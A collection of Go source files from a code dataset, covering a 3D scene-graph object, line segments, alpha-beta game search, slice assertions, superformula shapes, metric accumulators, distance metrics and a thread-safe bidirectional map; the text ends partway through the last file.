q1 := math.NewDefaultQuaternion()
q1.SetFromAxisAngle(axis, angle)
obj.quaternion.Multiply(q1)
}
func (obj *Object3) RotateOnWorldAxis(axis *math.Vector3, angle math.Angle) {
q1 := math.NewDefaultQuaternion()
q1.SetFromAxisAngle(axis, angle)
obj.quaternion.PreMultiply(q1)
}
func (obj *Object3) RotateX(angle math.Angle) {
obj.RotateOnAxis(math.NewVector3(1, 0, 0), angle)
}
func (obj *Object3) RotateY(angle math.Angle) {
obj.RotateOnAxis(math.NewVector3(0, 1, 0), angle)
}
func (obj *Object3) RotateZ(angle math.Angle) {
obj.RotateOnAxis(math.NewVector3(0, 0, 1), angle)
}
func (obj *Object3) TranslateOnAxis(axis *math.Vector3, distance float32) {
tmp := axis.Clone()
tmp.ApplyQuaternion(&obj.quaternion)
tmp.MultiplyScalar(distance)
obj.Position.Add(tmp)
}
func (obj *Object3) TranslateX(distance float32) {
obj.TranslateOnAxis(math.NewVector3(1, 0, 0), distance)
}
func (obj *Object3) TranslateY(distance float32) {
obj.TranslateOnAxis(math.NewVector3(0, 1, 0), distance)
}
func (obj *Object3) TranslateZ(distance float32) {
obj.TranslateOnAxis(math.NewVector3(0, 0, 1), distance)
}
func (obj *Object3) LocalToWorld(vector *math.Vector3) {
vector.ApplyMatrix4(&obj.matrixWorld)
}
func (obj *Object3) WorldToLocal(vector *math.Vector3) {
m1 := math.NewDefaultMatrix4()
m1.SetInverseOf(&obj.matrixWorld, false)
vector.ApplyMatrix4(m1)
}
func (obj *Object3) LookAtComponents(x, y, z float32) {
obj.LookAt(math.NewVector3(x, y, z))
}
func (obj *Object3) LookAt(x *math.Vector3) {
q1 := math.NewDefaultQuaternion()
m1 := math.NewDefaultMatrix4()
target := math.NewDefaultVector3()
position := math.NewDefaultVector3()
obj.updateWorldMatrix(true, false)
position.SetFromMatrixPosition(&obj.matrixWorld)
if obj.IsCamera() {
m1.LookAt(position, target, &obj.up)
} else {
m1.LookAt(target, position, &obj.up)
}
obj.quaternion.SetFromRotationMatrix(m1)
if obj.parent != nil {
m1.ExtractRotation(&obj.parent.matrixWorld)
q1.SetFromRotationMatrix(m1)
q1.Inverse()
obj.quaternion.PreMultiply(q1)
}
}
func (obj *Object3) Add(object *Object3) {
if object.parent != nil {
object.parent.Remove(object)
}
object.parent = obj
object.addEvent.Emit(obj, nil)
obj.children = append(obj.children, object)
}
func (obj *Object3) AddAll(objects []*Object3) {
for _, object := range objects {
obj.Add(object)
}
}
func (obj *Object3) Remove(object *Object3) {
for i, child := range obj.children {
if child == object {
object.parent = nil
object.removeEvent.Emit(obj, nil)
obj.children = append(obj.children[:i], obj.children[i+1:]...)
}
}
}
func (obj *Object3) RemoveAll(objects []*Object3) {
for _, object := range objects {
obj.Remove(object)
}
}
func (obj *Object3) GetParent() *Object3 {
return obj.parent
}
func (obj *Object3) GetChildren() []*Object3 {
castChildren := make([]*Object3, len(obj.children))
copy(castChildren, obj.children)
return castChildren
}
func (obj *Object3) GetChildrenById(id Id) *Object3 {
for _, child := range obj.children {
if child.id == id {
return child
} else {
return child.GetChildrenById(id)
}
}
return nil
}
func (obj *Object3) GetChildrenByName(name string) *Object3 {
for _, child := range obj.children {
if child.Name == name {
return child
} else {
return child.GetChildrenByName(name)
}
}
return nil
}
func (obj *Object3) GetWorldPosition() *math.Vector3 {
target := math.NewDefaultVector3()
obj.CopyWorldPosition(target)
return target
}
func (obj *Object3) CopyWorldPosition(target *math.Vector3) {
obj.UpdateMatrixWorld(true)
target.SetFromMatrixPosition(&obj.matrixWorld)
}
func (obj *Object3) GetWorldQuaternion() *math.Quaternion {
target := math.NewDefaultQuaternion()
obj.CopyWorldQuaternion(target)
return target
}
func (obj *Object3) CopyWorldQuaternion(target *math.Quaternion) {
position := math.NewDefaultVector3()
scale := math.NewDefaultVector3()
obj.UpdateMatrixWorld(true)
obj.matrixWorld.DeCompose(position, target, scale)
}
func (obj *Object3) GetWorldScale() *math.Vector3 {
target := math.NewDefaultVector3()
obj.CopyWorldScale(target)
return target
}
func (obj *Object3) CopyWorldScale(target *math.Vector3) {
position := math.NewDefaultVector3()
quaternion := math.NewDefaultQuaternion()
obj.UpdateMatrixWorld(true)
obj.matrixWorld.DeCompose(position, quaternion, target)
}
func (obj *Object3) GetWorldDirection() *math.Vector3 {
target := math.NewDefaultVector3()
obj.CopyWorldDirection(target)
return target
}
func (obj *Object3) CopyWorldDirection(target *math.Vector3) {
obj.UpdateMatrixWorld(true)
e := obj.matrixWorld.GetElements()
target.Set(e[8], e[9], e[10])
target.Normalize()
}
func (obj *Object3) TraverseIterator(onlyVisible bool) *object3Iterator {
return &object3Iterator{
current: -1,
data: obj.allChildren(onlyVisible),
}
}
func (obj *Object3) allChildren(onlyVisible bool) []*Object3 {
var ch []*Object3
if onlyVisible {
ch := make([]*Object3, 0)
for _, child := range ch {
if child.Visible {
ch = append(ch, child)
}
}
} else {
ch := make([]*Object3, len(obj.children))
copy(ch, obj.children)
}
for _, child := range obj.children {
ch = append(ch, child.allChildren(onlyVisible)...)
}
return ch
}
func (obj *Object3) TraverseAncestorsIterator() *object3Iterator {
return &object3Iterator{
current: -1,
data: obj.allParents(),
}
}
func (obj *Object3) allParents() []*Object3 {
if obj.parent == nil {
return []*Object3{}
} else {
return append(obj.parent.allParents(), obj.parent)
}
}
func (obj *Object3) Clone(recursive bool) *Object3 {
no := NewObject()
no.Copy(obj, recursive)
return no
}
// Recursive = TRUE by default
func (obj *Object3) Copy(source *Object3, recursive bool) {
obj.Name = source.Name
obj.up = *source.up.Clone()
obj.Position = *source.Position.Clone()
obj.quaternion = *source.quaternion.Clone()
obj.Scale = *source.Scale.Clone()
obj.matrix = *source.matrix.Clone()
obj.matrixWorld = *source.matrixWorld.Clone()
obj.matrixAutoUpdate = source.matrixAutoUpdate
obj.matrixWorldNeedsUpdate = source.matrixWorldNeedsUpdate
obj.layers.mask = source.layers.mask
obj.Visible = source.Visible
obj.castShadow = source.castShadow
obj.receiveShadow = source.receiveShadow
obj.frustumCulled = source.frustumCulled
obj.RenderOrder = source.RenderOrder
if recursive {
for _, child := range source.children {
obj.Add(child.Clone(recursive))
}
}
}
func (obj *Object3) UpdateMatrix() {
obj.matrix.Compose(&obj.Position, &obj.quaternion, &obj.Scale)
obj.matrixWorldNeedsUpdate = true
}
func (obj *Object3) UpdateMatrixWorld(force bool) {
if obj.matrixAutoUpdate {
obj.UpdateMatrix()
}
if obj.matrixWorldNeedsUpdate || force {
if obj.parent == nil {
obj.matrixWorld.Copy(&obj.matrix)
} else {
obj.matrixWorld.MultiplyMatrices(&obj.parent.matrixWorld, &obj.matrix)
}
obj.matrixWorldNeedsUpdate = false
force = true
}
// update children
for _, child := range obj.children {
child.UpdateMatrixWorld(force)
}
}
func (obj *Object3) updateWorldMatrix(updateParents, updateChildren bool) {
if updateParents == true && obj.parent != nil {
obj.parent.updateWorldMatrix(true, false)
}
if obj.matrixAutoUpdate {
obj.UpdateMatrix()
}
if obj.parent == nil {
obj.matrixWorld.Copy(&obj.matrix)
} else {
obj.matrixWorld.MultiplyMatrices(&obj.parent.matrixWorld, &obj.matrix)
}
// update children
if updateChildren == true {
for i := 0; i < len(obj.children); i++ {
obj.children[i].updateWorldMatrix(false, true)
}
}
}
func (obj *Object3) GetMatrixWorld() *math.Matrix4 {
return &obj.matrixWorld
}
type object3Iterator struct {
current int
data []*Object3
}
func (it *object3Iterator) Value() *Object3 {
return it.data[it.current]
}
func (it *object3Iterator) Next() bool {
it.current++
if it.current >= len(it.data) {
return false
}
return true
} | core/object3.go | 0.729327 | 0.449574 | object3.go | starcoder |
package math32
// Line3 represents a 3D line segment defined by a start and an end point.
type Line3 struct {
start Vector3
end Vector3
}
// NewLine3 creates and returns a pointer to a new Line3 with the
// specified start and end points.
func NewLine3(start, end *Vector3) *Line3 {
l := new(Line3)
l.Set(start, end)
return l
}
// OperateOnVertices iterates over all the vertices and calls
// the specified callback function with a pointer to each vertex.
// The vertex pointers can be modified inside the callback and
// the modifications will be applied to the triangle at each iteration.
// The callback function returns false to continue or true to break.
func (t *Line3) OperateOnVertices(cb func(vertex *Vector3) bool) {
if cb(&t.start) == true {
return
}
if cb(&t.end) == true {
return
}
}
// ReadVertices iterates over all the vertices and calls
// the specified callback function with the value of each vertex.
// The callback function returns false to continue or true to break.
func (t *Line3) ReadVertices(cb func(vertex Vector3) bool) {
if cb(t.start) == true {
return
}
if cb(t.end) == true {
return
}
}
// Returns the start point for the line
func (l *Line3) Start() *Vector3 {
return &l.start
}
// Returns the end point for the line
func (l *Line3) End() *Vector3 {
return &l.end
}
// Set sets this line segment start and end points.
// Returns pointer to this updated line segment.
func (l *Line3) Set(start, end *Vector3) *Line3 {
if start != nil {
l.start = *start
}
if end != nil {
l.end = *end
}
return l
}
// Copy copy other line segment to this one.
// Returns pointer to this updated line segment.
func (l *Line3) Copy(other *Line3) *Line3 {
*l = *other
return l
}
// Center calculates this line segment center point.
// Store its pointer into optionalTarget, if not nil, and also returns it.
func (l *Line3) Center(optionalTarget *Vector3) *Vector3 {
var result *Vector3
if optionalTarget == nil {
result = NewVector3(0, 0, 0)
} else {
result = optionalTarget
}
return result.AddVectors(&l.start, &l.end).MultiplyScalar(0.5)
}
// Delta calculates the vector from the start to end point of this line segment.
// Store its pointer in optionalTarget, if not nil, and also returns it.
func (l *Line3) Delta(optionalTarget *Vector3) *Vector3 {
var result *Vector3
if optionalTarget == nil {
result = NewVector3(0, 0, 0)
} else {
result = optionalTarget
}
return result.SubVectors(&l.end, &l.start)
}
// DistanceSq returns the square of the distance from the start point to the end point.
func (l *Line3) DistanceSq() float32 {
return l.start.DistanceToSquared(&l.end)
}
// Distance returns the distance from the start point to the end point.
func (l *Line3) Distance() float32 {
return l.start.DistanceTo(&l.end)
}
// ApplyMatrix4 applies the specified matrix to this line segment start and end points.
// Returns pointer to this updated line segment.
func (l *Line3) ApplyMatrix4(matrix *Matrix4) *Line3 {
l.start.ApplyMatrix4(matrix)
l.end.ApplyMatrix4(matrix)
return l
}
// Equals returns if this line segement is equal to other.
func (l *Line3) Equals(other *Line3) bool {
return other.start.Equals(&l.start) && other.end.Equals(&l.end)
}
// Clone creates and returns a pointer to a copy of this line segment.
func (l *Line3) Clone() *Line3 {
return NewLine3(&l.start, &l.end)
} | math32/line3.go | 0.915231 | 0.707758 | line3.go | starcoder |
package vulpes
import (
"math"
"sort"
)
const (
// LOSS means the game is over and the current player has lost the game.
LOSS = iota
// TIE means the game is over and ended in a tie.
TIE
// WIN means the game is over and the current player has won the game.
WIN
// UNFINISHED means the game is not yet over.
UNFINISHED
)
// Game describes a two-player, zero-sum, turn-based game.
type Game interface {
// Children returns the child nodes from this one. If the game is not ended, this must return at least 1 child.
Children() []Game
// Evaluate returns an evaluation of the current game state from the perspective of the current player. 'ending' must be one of {LOSS, TIE, WIN, UNFINISHED}. 'heuristic' is only required when ending is UNFINISHED.
Evaluate() (ending int, heuristic float64)
}
type moveScore struct {
moveIndex int
moveScore float64
}
type moveScores []moveScore
func (s moveScores) Len() int { return len(s) }
func (s moveScores) Less(i, j int) bool { return s[i].moveScore > s[j].moveScore }
func (s moveScores) Swap(i, j int) { s[i], s[j] = s[j], s[i] }
// Search returns the computed score of a given state.
func Search(state Game, depth uint, alpha, beta float64) (Game, float64) {
ending, heuristic := state.Evaluate()
switch ending {
case LOSS:
return state, math.Inf(-1)
case TIE:
return state, 0
case WIN:
return state, math.Inf(1)
}
if depth == 0 {
return state, heuristic
}
children := state.Children()
moveScores := make(moveScores, len(children))
for i := range children {
moveScores[i] = moveScore{i, 0.0}
}
var tmpScore float64
if depth > 1 {
// Pre-sort the possible moves by their score to speed up the pruning
for i, child := range children {
// Depth-0 search to force heuristic scoring
_, tmpScore = Search(child, 0, -beta, -alpha)
moveScores[i].moveScore = -tmpScore
}
sort.Sort(moveScores)
}
var bestChild Game
for _, moveScore := range moveScores {
child := children[moveScore.moveIndex]
_, tmpScore = Search(child, depth-1, -beta, -alpha)
tmpScore = -tmpScore
if tmpScore > alpha {
alpha = tmpScore
bestChild = child
if beta <= alpha {
return bestChild, beta
}
}
if bestChild == nil {
// Take the first child, in case all the children are terrible.
bestChild = child
}
}
if bestChild == nil {
// No possible moves, so return the current state.
bestChild = state
}
return bestChild, alpha
}
// SolveGame takes a starting node for the game, and returns the best child node and its score, after searching to the specified depth
func SolveGame(state Game, depth uint) (Game, float64) {
return Search(state, depth, math.Inf(-1), math.Inf(1))
} | vulpes.go | 0.562898 | 0.416915 | vulpes.go | starcoder |
package values
import (
"reflect"
"sort"
)
// SliceValue is a struct that holds a string slice value.
type SliceValue struct {
value interface{}
}
// IsEqualTo returns true if the value is equal to the expected value, else false.
func (s SliceValue) IsEqualTo(expected interface{}) bool {
if !IsSlice(expected) || !IsSlice(s.Value()) {
return false
}
actualValue := reflect.ValueOf(s.value)
expectedValue := reflect.ValueOf(expected)
return areSlicesEqual(actualValue, expectedValue)
}
// IsEmpty returns true if the slice is empty else false.
func (s SliceValue) IsEmpty() bool {
return s.HasSize(0)
}
// IsNotEmpty returns true if the slice is not empty else false.
func (s SliceValue) IsNotEmpty() bool {
return !s.IsEmpty()
}
// HasSize returns true if the slice has the expected size else false.
func (s SliceValue) HasSize(length int) bool {
return s.Size() == length
}
// Size returns the slice size.
func (s SliceValue) Size() int {
if !IsSlice(s.Value()) {
return 0
}
return reflect.ValueOf(s.Value()).Len()
}
func (s SliceValue) contains(element reflect.Value) bool {
actualValue := reflect.ValueOf(s.Value())
for i := 0; i < actualValue.Len(); i++ {
if areEqualValues(actualValue.Index(i), element) {
return true
}
}
return false
}
// Contains returns true if the slice contains the expected element(s) else false.
func (s SliceValue) Contains(elements interface{}) bool {
if !IsSlice(s.Value()) {
return false
}
if !IsSlice(elements) {
return s.contains(reflect.ValueOf(elements))
}
expectedValue := reflect.ValueOf(elements)
all := true
for i := 0; i < expectedValue.Len(); i++ {
all = all && s.contains(expectedValue.Index(i))
}
return all
}
// DoesNotContain returns true if the slice does not contain the expected element(s) else false.
func (s SliceValue) DoesNotContain(elements interface{}) bool {
return !s.Contains(elements)
}
// ContainsOnly returns true if the slice contains only the expected element(s) else false.
func (s SliceValue) ContainsOnly(elements interface{}) bool {
return s.Contains(elements) && s.HasSize(reflect.ValueOf(elements).Len())
}
// HasUniqueElements returns true if the slice contains only unique elements else false.
func (s SliceValue) HasUniqueElements() bool {
if !IsSlice(s.Value()) {
return false
}
sliceValue := reflect.ValueOf(s.value)
elements := map[interface{}]bool{}
for i := 0; i < sliceValue.Len(); i++ {
if _, ok := elements[sliceValue.Index(i).Interface()]; ok {
return false
}
elements[sliceValue.Index(i).Interface()] = true
}
return true
}
// IsSorted returns true if the slice is sorted else false.
func (s SliceValue) IsSorted(desc bool) bool {
if !IsSlice(s.Value()) {
return false
}
sliceValue := reflect.ValueOf(s.value)
if sliceValue.Len() <= 1 {
return true
}
switch sliceType := s.value.(type) {
case []int:
if desc {
sliceType = reverseInts(sliceType)
}
return sort.IntsAreSorted(sliceType)
case []int32, []int64:
sliceLen := sliceValue.Len()
intSlice := make([]int, 0, sliceLen)
for i := 0; i < sliceLen; i++ {
intSlice = append(intSlice, int(sliceValue.Index(i).Int()))
}
if desc {
intSlice = reverseInts(intSlice)
}
return sort.IntsAreSorted(intSlice)
case []float64:
if desc {
sliceType = reverseFloats(sliceType)
}
return sort.Float64sAreSorted(sliceType)
case []string:
if desc {
sliceType = reverseStrings(sliceType)
}
return sort.StringsAreSorted(sliceType)
case sort.Interface:
if desc {
sliceType = sort.Reverse(sliceType)
}
return sort.IsSorted(sliceType)
}
return false
}
func reverseInts(ints []int) []int {
for i, j := 0, len(ints)-1; i < j; i, j = i+1, j-1 {
ints[i], ints[j] = ints[j], ints[i]
}
return ints
}
func reverseFloats(floats []float64) []float64 {
for i, j := 0, len(floats)-1; i < j; i, j = i+1, j-1 {
floats[i], floats[j] = floats[j], floats[i]
}
return floats
}
func reverseStrings(strings []string) []string {
for i, j := 0, len(strings)-1; i < j; i, j = i+1, j-1 {
strings[i], strings[j] = strings[j], strings[i]
}
return strings
}
// Value returns the actual value of the structure.
func (s SliceValue) Value() interface{} {
return s.value
}
// NewSliceValue creates and returns a SliceValue struct initialed with the given value.
func NewSliceValue(value interface{}) SliceValue {
return SliceValue{value: value}
}
// IsSlice returns true if the given value is a slice, else false.
func IsSlice(value interface{}) bool {
return reflect.ValueOf(value).Kind() == reflect.Slice || reflect.ValueOf(value).Kind() == reflect.Array
} | internal/pkg/values/slice_value.go | 0.846387 | 0.631694 | slice_value.go | starcoder |
package synth
import (
"math"
)
// Form holds the 6 parameters needed to for the superformula to
// create supershapes. Form uses the the superformula to generate
// points in both 2D and 3D. See:
// https://en.wikipedia.org/wiki/Superformula
// http://paulbourke.net/geometry/supershape/
type Form struct {
M float64 // Angle multiplier
N1 float64 // Overall exponent.
N2 float64 // Cos exponent.
N3 float64 // Sin exponent.
A float64 // Cos divisor
B float64 // Sin divisor
}
// CircleForm is the default state of a super formula whose
// shape is a 2D circle or 3D sphere with values 0,1,1,1,1,1.
// Not expected to be changed.
var CircleForm = &Form{M: 0, N1: 1, N2: 1, N3: 1, A: 1, B: 1}
// NewForm creates a supershape at its default circle/sphere shape.
func NewForm() *Form {
return &Form{M: 0, N1: 1, N2: 1, N3: 1, A: 1, B: 1}
}
// SetValues sets the superform to the given values.
func (f *Form) SetValues(m, n1, n2, n3, a, b float64) {
f.M, f.N1, f.N2, f.N3, f.A, f.B = m, n1, n2, n3, a, b
}
// Set the superform to the given Form fm.
func (f *Form) Set(fm *Form) {
f.M, f.N1, f.N2, f.N3, f.A, f.B = fm.M, fm.N1, fm.N2, fm.N3, fm.A, fm.B
}
// Radius runs the superformula for the given angle in radians.
func (f *Form) Radius(angle float64) (r float64) {
t1 := math.Pow(math.Abs(math.Cos(f.M*angle/4)/f.A), f.N2)
t2 := math.Pow(math.Abs(math.Sin(f.M*angle/4)/f.B), f.N3)
radius := math.Pow(t1+t2, 1/f.N1)
if math.Abs(radius) == 0 {
return 0
}
radius = 1 / radius
return radius
}
// At2D returns the 2D point for a given angle in radians.
func (f *Form) At2D(angle float64) (x, y float64) {
radius := f.Radius(angle)
x = radius * math.Cos(angle)
y = radius * math.Sin(angle)
return x, y
}
// At3D returns the 3D point for the supplied lat and lon angles in radians.
// lat is the angle in radians between Pi/2 and -Pi/2.
// lon is the angle in radians between Pi and -Pi.
func (f *Form) At3D(lat, lon float64) (x, y, z float64) {
r1 := f.Radius(lon)
r2 := f.Radius(lat)
x = r1 * math.Cos(lon) * r2 * math.Cos(lat)
y = r1 * math.Sin(lon) * r2 * math.Cos(lat)
z = r2 * math.Sin(lat)
return x, y, z
} | synth/form.go | 0.879147 | 0.673217 | form.go | starcoder |
package internal
import (
"time"
"github.com/influxdata/telegraf"
)
type Measurement struct {
Name string
Fields map[string]interface{}
Tags map[string]string
T []time.Time
}
// StoreAccumulator store in memory all value pushed by AddFields, AddGauge...
// All type (fields, gague, counter) are processed the same, and can't be distinguished.
type StoreAccumulator struct {
Measurement []Measurement
Errors []error
}
// Send forward all captured measurement using acc.AddFields. It also send errors using AddError.
func (a *StoreAccumulator) Send(acc telegraf.Accumulator) {
for _, m := range a.Measurement {
acc.AddFields(m.Name, m.Fields, m.Tags, m.T...)
}
for _, err := range a.Errors {
acc.AddError(err)
}
}
func (a *StoreAccumulator) processMetrics(measurement string, fields map[string]interface{}, tags map[string]string, t ...time.Time) {
a.Measurement = append(a.Measurement, Measurement{
Name: measurement,
Fields: fields,
Tags: tags,
T: t,
})
}
// AddFields adds a metric to the accumulator with the given measurement
// name, fields, and tags (and timestamp). If a timestamp is not provided,
// then the accumulator sets it to "now".
func (a *StoreAccumulator) AddFields(measurement string, fields map[string]interface{}, tags map[string]string, t ...time.Time) {
a.processMetrics(measurement, fields, tags, t...)
}
// AddGauge is the same as AddFields, but will add the metric as a "Gauge" type.
func (a *StoreAccumulator) AddGauge(measurement string, fields map[string]interface{}, tags map[string]string, t ...time.Time) {
a.processMetrics(measurement, fields, tags, t...)
}
// AddCounter is the same as AddFields, but will add the metric as a "Counter" type.
func (a *StoreAccumulator) AddCounter(measurement string, fields map[string]interface{}, tags map[string]string, t ...time.Time) {
a.processMetrics(measurement, fields, tags, t...)
}
// AddSummary is the same as AddFields, but will add the metric as a "Summary" type.
func (a *StoreAccumulator) AddSummary(measurement string, fields map[string]interface{}, tags map[string]string, t ...time.Time) {
a.processMetrics(measurement, fields, tags, t...)
}
// AddHistogram is the same as AddFields, but will add the metric as a "Histogram" type.
func (a *StoreAccumulator) AddHistogram(measurement string, fields map[string]interface{}, tags map[string]string, t ...time.Time) {
a.processMetrics(measurement, fields, tags, t...)
}
// AddMetric adds an metric to the accumulator.
func (a *StoreAccumulator) AddMetric(telegraf.Metric) {
a.AddError(errNotImplemented)
}
// AddError reports an error.
func (a *StoreAccumulator) AddError(err error) {
a.Errors = append(a.Errors, err)
}
// SetPrecision takes two time.Duration objects. If the first is non-zero,
// it sets that as the precision. Otherwise, it takes the second argument
// as the order of time that the metrics should be rounded to, with the
// maximum being 1s.
func (a *StoreAccumulator) SetPrecision(precision time.Duration) {
a.AddError(errNotImplemented)
}
// WithTracking upgrades to a TrackingAccumulator with space for maxTracked
// metrics/batches.
func (a *StoreAccumulator) WithTracking(maxTracked int) telegraf.TrackingAccumulator {
a.AddError(errNotImplemented)
return nil
} | inputs/internal/store_accumulator.go | 0.709523 | 0.431405 | store_accumulator.go | starcoder |
package distance
import (
"errors"
"math"
)
// DistMetric returns a function for calculating the distance between two vectors.
// Any entries that are zero in both vectors are ignored and vectors must be equal
// length. Default metric is euclidean.
func DistMetric(metric string) func(x []float64, y []float64) (dist float64, err error) {
if metric == "binary" {
// Binary considers two non-zero values to be equivalent.
binary := func(x []float64, y []float64) (dist float64, err error) {
if len(x) != len(y) {
err = errors.New("Vectors for calculating distance must have equal length")
return
}
denominator := float64(0)
numerator := float64(0)
for i := range x {
if x[i] > 0 && y[i] > 0 {
numerator++
}
// Ignore i when both x[i] and y[i] are zero.
if x[i] > 0 || y[i] > 0 {
denominator++
}
}
dist = 1 - (numerator / denominator)
return
}
return binary
} else if metric == "canberra" {
// Canberra is a weighted version of manhattan.
canberra := func(x []float64, y []float64) (dist float64, err error) {
if len(x) != len(y) {
err = errors.New("Vectors for calculating distance must have equal length")
return
}
dist = 0
for i := range x {
// Ignore i when both x[i] and y[i] are zero.
if x[i] > 0 || y[i] > 0 {
dist += math.Abs(x[i]-y[i]) / (math.Abs(x[i]) + math.Abs(y[i]))
}
}
return
}
return canberra
} else if metric == "jaccard" {
// Generalized Jaccard distance.
jaccard := func(x []float64, y []float64) (dist float64, err error) {
if len(x) != len(y) {
err = errors.New("Vectors for calculating distance must have equal length")
return
}
denominator := float64(0)
numerator := float64(0)
for i := range x {
// Ignore i when both x[i] and y[i] are zero.
if x[i] > 0 || y[i] > 0 {
numerator += math.Min(x[i], y[i])
denominator += math.Max(x[i], y[i])
}
}
dist = 1 - (numerator / denominator)
return
}
return jaccard
} else if metric == "manhattan" {
// Manhattan sums the differences.
manhattan := func(x []float64, y []float64) (dist float64, err error) {
if len(x) != len(y) {
err = errors.New("Vectors for calculating distance must have equal length")
return
}
dist = 0
for i := range x {
dist += math.Abs(x[i] - y[i])
}
return
}
return manhattan
} else if metric == "maximum" {
// Distance between vectors is the maximum difference between elements.
maximum := func(x []float64, y []float64) (dist float64, err error) {
if len(x) != len(y) {
err = errors.New("Vectors for calculating distance must have equal length")
return
}
dist = 0
for i := range x {
diff := math.Abs(x[i] - y[i])
if diff > dist {
dist = diff
}
}
return
}
return maximum
}
// Euclidean by default.
euclidean := func(x []float64, y []float64) (dist float64, err error) {
if len(x) != len(y) {
err = errors.New("Vectors for calculating distance must have equal length")
return
}
dist = 0
for i := range x {
diff := x[i] - y[i]
dist += diff * diff
}
dist = math.Sqrt(dist)
return
}
return euclidean
} | distance/distmetric.go | 0.74055 | 0.624122 | distmetric.go | starcoder |
package accumulator
import (
"context"
"sync"
"time"
)
// Accumulator stores data on an interval and allows you to access it.
type Accumulator struct {
ctx context.Context
sync.RWMutex
Label string // used to identify the owner of an accumulator.
Samples []*Sample
acc int64
total int64 // total number of increments ever.
// Samples to store before being discarded.
storedSamples int
// Time between sampling from the accumulator.
// 600 samples with an interval of 1 second will provide a 10 minute history.
// 5760 with an interval of 15 seconds will provide a 1 day history.
interval time.Duration
}
// Sample contains the time the sample was made and its value.
type Sample struct {
Value int64 `json:"value"`
StoredAt time.Time `json:"stored_at"`
}
// Sum returns the total number of increments the Accumulator has ever seen.
func (ac *Accumulator) Sum() int64 {
ac.RLock()
defer ac.RUnlock()
return ac.total
}
// Increment increments the accumulator by 1.
func (ac *Accumulator) Increment() {
ac.IncrementBy(1)
}
// IncrementBy increments the accumulator by a specified number.
func (ac *Accumulator) IncrementBy(acc int64) {
ac.Lock()
defer ac.Unlock()
ac.acc += acc
}
// GetAllSamples returns all samples from the accumulator.
func (ac *Accumulator) GetAllSamples() *SampleGroup {
return &SampleGroup{
Label: ac.Label,
Samples: ac.Samples,
}
}
// GetLastSamples returns the last N samples from the accumulator.
func (ac *Accumulator) GetLastSamples(n int) *SampleGroup {
index := len(ac.Samples) - n
if index < 0 {
index = 0
}
ac.RLock()
defer ac.RUnlock()
return &SampleGroup{
Label: ac.Label,
Samples: ac.Samples[index:],
}
}
// GetSamplesSince returns the last N samples from the accumulator in the specified time.
func (ac *Accumulator) GetSamplesSince(t time.Time) *SampleGroup {
ac.RLock()
defer ac.RUnlock()
for index := range ac.Samples {
if ac.Samples[len(ac.Samples)-index].StoredAt.After(t) {
return &SampleGroup{
Label: ac.Label,
Samples: ac.Samples[index:],
}
}
}
return &SampleGroup{
Label: ac.Label,
Samples: ac.Samples,
}
}
// SampleGroup holds a group of samples.
type SampleGroup struct {
Label string
Samples []*Sample
}
// Sum returns the sum of all samples in a samplegroup object.
func (sg *SampleGroup) Sum() int64 {
acc := int64(0)
for _, sample := range sg.Samples {
acc += sample.Value
}
return acc
}
// Avg returns the average of all samples in a samplegroup object.
func (sg *SampleGroup) Avg() float64 {
return float64(sg.Sum()) / float64(len(sg.Samples))
}
// Since returns a samplegroup with all samples after a specified time.
func (sg *SampleGroup) Since(t time.Time) *SampleGroup {
for index := range sg.Samples {
if sg.Samples[len(sg.Samples)-index].StoredAt.After(t) {
sg.Samples = sg.Samples[index:]
}
}
return &SampleGroup{
Label: "",
Samples: sg.Samples,
}
}
// RunOnce allows you to manually call the accumulator task in the event you already have a task running every interval.
func (ac *Accumulator) RunOnce(t time.Time) {
ac.Lock()
ac.Samples = append(ac.Samples, &Sample{
Value: ac.acc,
StoredAt: t,
})
// Reset accumulator.
ac.acc = 0
// If we surpass the stored samples number, remove old samples.
if len(ac.Samples) > ac.storedSamples {
ac.Samples = ac.Samples[len(ac.Samples)-ac.storedSamples:]
}
ac.Unlock()
}
// Run starts the accumulator which will process the accumulator and store it appropriately.
func (ac *Accumulator) Run() {
t := time.NewTicker(ac.interval)
for {
select {
case <-ac.ctx.Done():
return
case <-t.C:
}
ac.RunOnce(time.Now().UTC())
}
}
// NewAccumulator creates an accumulator. This does not automatically call Run.
func NewAccumulator(ctx context.Context, storedSamples int, interval time.Duration) *Accumulator {
acc := &Accumulator{
ctx: ctx,
RWMutex: sync.RWMutex{},
Label: "",
Samples: make([]*Sample, 0, storedSamples),
acc: int64(0),
storedSamples: storedSamples,
interval: interval,
}
return acc
} | pkg/accumulator/accumulator.go | 0.826362 | 0.413714 | accumulator.go | starcoder |
package bimap
import "sync"
// BiMap is a bi-directional hashmap that is thread safe and supports immutability
type BiMap struct {
s sync.RWMutex
immutable bool
forward map[interface{}]interface{}
inverse map[interface{}]interface{}
}
// NewBiMap returns a an empty, mutable, biMap
func NewBiMap() *BiMap {
return &BiMap{forward: make(map[interface{}]interface{}), inverse: make(map[interface{}]interface{}), immutable: false}
}
// Insert puts a key and value into the BiMap, provided its mutable. Also creates the reverse mapping from value to key.
func (b *BiMap) Insert(k interface{}, v interface{}) {
b.s.RLock()
if b.immutable {
panic("Cannot modify immutable map")
}
b.s.RUnlock()
b.s.Lock()
defer b.s.Unlock()
b.forward[k] = v
b.inverse[v] = k
}
// Exists checks whether or not a key exists in the BiMap
func (b *BiMap) Exists(k interface{}) bool {
b.s.RLock()
defer b.s.RUnlock()
_, ok := b.forward[k]
return ok
}
// ExistsInverse checks whether or not a value exists in the BiMap
func (b *BiMap) ExistsInverse(k interface{}) bool {
b.s.RLock()
defer b.s.RUnlock()
_, ok := b.inverse[k]
return ok
}
// Get returns the value for a given key in the BiMap and whether or not the element was present.
func (b *BiMap) Get(k interface{}) (interface{}, bool) {
if !b.Exists(k) {
return "", false
}
b.s.RLock()
defer b.s.RUnlock()
return b.forward[k], true
}
// GetInverse returns the key for a given value in the BiMap and whether or not the element was present.
func (b *BiMap) GetInverse(v interface{}) (interface{}, bool) {
if !b.ExistsInverse(v) {
return "", false
}
b.s.RLock()
defer b.s.RUnlock()
return b.inverse[v], true
}
// Delete removes a key-value pair from the BiMap for a given key. Returns if the key doesn't exist
func (b *BiMap) Delete(k interface{}) {
b.s.RLock()
if b.immutable {
panic("Cannot modify immutable map")
}
b.s.RUnlock()
if !b.Exists(k) {
return
}
val, _ := b.Get(k)
b.s.Lock()
defer b.s.Unlock()
delete(b.forward, k)
delete(b.inverse, val)
}
// DeleteInverse emoves a key-value pair from the BiMap for a given value. Returns if the value doesn't exist
func (b *BiMap) DeleteInverse(v interface{}) {
b.s.RLock()
if b.immutable {
panic("Cannot modify immutable map")
}
b.s.RUnlock()
if !b.ExistsInverse(v) {
return
}
